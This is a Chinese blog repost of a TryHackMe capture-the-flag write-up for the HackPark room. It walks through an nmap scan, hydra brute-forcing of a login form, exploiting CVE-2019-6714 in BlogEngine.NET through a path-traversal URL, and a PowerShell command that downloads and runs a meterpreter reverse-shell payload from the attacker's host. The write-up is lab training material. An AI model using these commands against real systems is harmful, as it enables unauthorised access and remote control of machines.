我是靠谱客的博主 飘逸橘子,最近开发中收集的这篇文章主要介绍TryHackMe-进攻性渗透测试-03_HackParkHackPark,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

HackPark

循例 nmap 扫,带-Pn参数

┌──(root????kali)-[/home/sugobet]
└─# nmap 10.10.161.251 -Pn

只开了80和3389

上web看看,

题目提问网站的小丑图片中的小丑叫什么名字
网站上找不到,把图片也下载下载strings看看有没有东西,很遗憾没有

然后通过社交得知,这是一部电影 小丑回魂中的????,百度得知名字

Pennywise

在刚刚找名字的时候找到了后台登录页面

题目要求使用hydra爆破

hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
[80][http-post-form] host: 10.10.161.251   login: admin   password: 1qaz2wsx

hydra爆web稍微确实是麻烦了点,直接用burp会更方便

收集到信息:BlogEngine.NET v3.3.6.0

searchsploit BlogEngine.NET

CVE-2019-6714

存在任意文件上传/rce/目录穿越

将payload的ip和port修改为我们的,并且将文件名修改为

PostView.ascx

上传后,netcat开启监听,并访问:

http://10.10.161.251/?theme=../../App_Data/files

成功getshell

题目要求使用metasploit,首先使用msfvenom生成payload

攻击机开启http服务,目标上使用powershell下载payload

powershell -c "wget http://10.11.17.14:8000/windows-tools_and_exp/meterpreter_rev_she11.exe"

msfconsole开启监听

目标上运行:

meterpreter_rev_she11.exe

对windows方面比较差,后面看着别人的wp做…

最后

以上就是飘逸橘子为你收集整理的TryHackMe-进攻性渗透测试-03_HackParkHackPark的全部内容,希望文章能够帮你解决TryHackMe-进攻性渗透测试-03_HackParkHackPark所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(34)

评论列表共有 0 条评论

立即
投稿
返回
顶部